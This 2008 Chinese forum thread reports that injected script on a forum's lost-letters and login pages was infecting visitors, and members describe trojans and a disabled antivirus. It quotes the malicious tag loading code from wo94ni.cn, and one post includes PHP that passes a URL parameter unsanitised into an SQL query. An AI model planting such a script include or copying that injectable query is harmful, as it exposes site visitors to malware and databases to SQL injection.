Master来看一下

黄豆(dlink@zy) · 发表于 2008-7-9 18:25:26

今天查看丢失信件的时候。http://www.sjever.net/bbs/loseletter.php这页面提示运行加载项。看源代码发现一段恶意代码，然后测试几个页面，登陆、退出的时候也有这种情况。建议master整理一下论坛，以避免造成数据丢失。

我发到这个版块只是想引起Master注意而已，不要扣我分啊。

恶意代码：<script src=http://wo94ni.cn/mm/></script>

下边放上我截下来的图片

刚才考虑了一下，这段恶意代码时有时无，也有可能是同机房的机器上中了ARP病毒。不管怎样master你还是检查一下论坛程序的好。

[ 本帖最后由 dlink@zy 于 2008-7-9 18:30 编辑 ]

本色(mmgg@zy) · 发表于 2008-7-9 20:40:59

谢谢黄豆的提醒，还好我最近不收信

。

柳随风(darken@zy) · 发表于 2008-7-9 21:03:08

fear，不过我以前没注意过

沧海(chgk@zy) · 发表于 2008-7-9 23:25:28

是服务器的问题我也遇到了今天晚上刚刷新丢失信件页面就感觉和中午的不一样了

黄豆(dlink@zy) · 发表于 2008-7-9 23:36:04

应该不是我电脑中毒。我在两台服务器上打开论坛页面也出现这种情况。
还有chgk也发现这个问题了。
恶意代码时有时无，估计是机房有电脑中ARP病毒。
建议大家自己电脑都安装好杀毒软件、防火墙。

本龙(clong@zy) · 发表于 2008-7-10 00:01:21

原帖由 dlink@zy 于 2008-7-9 18:25 发表
今天查看丢失信件的时候。http://www.sjever.net/bbs/loseletter.php这页面提示运行加载项。看源代码发现一段恶意代码，然后测试几个页面，登陆、退出的时候也有这种情况。建议master整理一下论坛，以避免造成数据丢 ...

master看我呢？

master · 发表于 2008-7-10 00:46:27

的确是有这个问题,
我查了一下BBS的本地代码也没有被改动.
应该是discuz的问题
目前来看好象也没什么危害
只能等官方补丁

本龙(clong@zy) · 发表于 2008-7-10 09:03:37

$uid = $_GET["uid"];
$query = ($db->query("select * from loseletter where username='{$uid}'"));
if (mysql_num_rows($query)==1) {
$thread = $db->fetch_array($query);
$_SESSION['imgstr'] = '请把信送给：'.$thread['sendtoid'];//生成验证码并存入sessionecho <<<eot
<img src="authcode.php"/><br/>
eot;
}
else echo '现在没有你要送的信,如有问题请联系管理员。

本能(tyq@zy) · 发表于 2008-7-10 09:25:57

没危害吗？我电脑上发现一堆木马，害我昨天一晚上都没挂机了，关机了事，今天早上一来搞了半天才杀干净，也是打开lostletter页面时，出现跟clong一样的提示，然后我跟我同事的电脑同时中标（他也在玩这个站）。

然后电脑上被自动装上了一个什么农历提示的软件，日期被修改，卡巴自动退出。。。。

气死我了，从来不上乱七八糟的网站，没想到上这个也会中标，郁闷。。。

本龙(clong@zy) · 发表于 2008-7-10 10:51:26

要求master给元宝补偿俺
2008-7-10 00:01
这么晚了俺都没睡觉，还得俺今天困死了。

账号		自动登录	找回密码
密码			注册

Master来看一下

本帖子中包含更多资源

评分

本帖子中包含更多资源